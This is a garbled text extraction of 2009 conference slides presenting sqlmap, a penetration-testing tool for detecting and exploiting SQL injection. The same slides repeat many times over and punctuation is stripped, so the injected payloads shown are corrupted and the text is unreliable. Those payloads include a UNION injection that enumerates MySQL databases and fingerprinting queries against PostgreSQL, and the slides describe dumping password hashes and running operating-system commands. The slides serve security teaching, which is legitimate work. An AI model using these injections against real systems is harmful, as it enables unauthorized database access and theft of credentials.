Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
